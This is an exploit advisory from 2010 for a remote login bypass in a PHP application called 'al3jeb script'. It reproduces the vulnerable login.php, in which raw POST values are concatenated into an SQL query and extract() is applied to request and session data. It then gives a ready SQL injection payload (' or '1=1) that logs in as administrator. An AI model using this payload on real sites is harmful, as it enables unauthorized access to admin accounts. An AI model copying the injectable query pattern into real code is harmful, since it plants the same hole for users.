\#'#/ (-.-) --------------------oOO---(_)---OOo------------------- |al3jeb script Remote Login Bypass Exploit | |(works only with magic_quotes_gpc = off)| ------------------------------------------------------ [!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org> [!] Date: 19.01.2010 [!] Remote: yes [!] Vulnerability Code [login.php] : <? session_start(); extract($_POST); extract($_GET); extract($_SESSION); extract($_COOKIE); ?> <?php include("Connections/config.php"); if(isset($_POST['Submit'])) { $u=$_POST["uname"]; $p=$_POST["pwd"]; $r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'"); if($row=mysql_fetch_array($r)) { $_SESSION['AdminName']=$u; if(isset($re)) { setcookie("username",$u,time()+3600); } header("location:index.php"); } } ?> [!] PoC: [al3jebscript]/login.php username : ' or '1=1 password : cr4wl3r
体验盒子